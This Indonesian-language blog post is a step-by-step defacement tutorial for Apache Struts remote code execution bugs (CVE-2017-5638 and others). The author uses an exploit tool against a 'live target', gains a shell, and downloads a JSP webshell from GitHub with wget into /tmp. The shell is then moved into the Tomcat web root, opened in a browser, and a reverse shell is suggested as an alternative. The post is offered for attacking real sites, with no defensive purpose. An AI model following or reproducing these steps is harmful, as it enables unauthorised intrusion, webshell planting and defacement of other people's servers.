Teknik Deface memanfaatkan bug Apache Struts (RCE)

Teknik Deface memanfaatkan bug Apache Struts (RCE)

Remote code execution sama seperti arbitrary code execution, dimana si attacker bisa mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi. 

mungkin temen teman disini ada yang blom tau apa itu RCE, 

oke disini ada 3 bug yaitu : 

CVE-2018-1176 
CVE-2017-5638 
CVE-2013-2251

3 bug itu punya bug yang sama yaitu RCE, oke disini saya sudah mempunyai toolsnya yang mampu mengexploitasi 3 bug itu sekaligus 


2018-09-06-200749_1366x768_scrot


oh iya tools ini biasanya menginjeksi tempat login seperti contoh live target saya#cmiiw

2018-09-06-201245_1366x768_scrot

nah setelah itu kita run exploitnya 

2018-09-06-201515_1366x768_scrot


nah klo ada kek gitu berarti vuln abis itu pilih s

nah otomatis kita dapet shell spawn yes >:'v

2018-09-06-201703_1366x768_scrot

abis itu wget shell kita :'v oh iya khusus buat ini kita harus make jsp shell :v

shell jsp : https://github.com/tennc/webshell/blob/master/jsp/shell.jsp
abis itu kita wget ke dir tmp :v

dengan command : wget -O /tmp/ewew.jsp https://raw.githubusercontent.com/tennc/webshell/master/jsp/shell.jsp

abis itu kita cek ada apa tidak di dir /tmp/ dengan command : ls /tmp/ewew.jsp

2018-09-06-202106_1366x768_scrot

yes masuk , oke selanjutnya kita mv ke dir rootnya :v nah ini yang ribet soalnya harus nyari path webnya dmn :v tapi tenang biasanya pathnya itu di /usr/local/tomcat7/webapps/ROOT/
*use your imagination

abis itu kita move filenya dari /tmp/ ke path webnya dengan command : mv /tmp/ /path/to/tomcat7ortomcatdll/webapps/ROOT/

contoh punya saya


2018-09-06-202523_1366x768_scrot


nah abis itu cek deh filenya ada atau tidak :v

site.com/shell.jsp

2018-09-06-202633_1366x768_scrot

yak mashook pak eko >:'v abis itu seterah kalian mau diapain :v

oh iya itu saya upload shell ea, klo teman teman pengen langsung reverse shellnya bisa kok dicoba aja ea

oke mungkin itu aja yang bisa oe post hari ini 

0 Response to "Teknik Deface memanfaatkan bug Apache Struts (RCE)"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel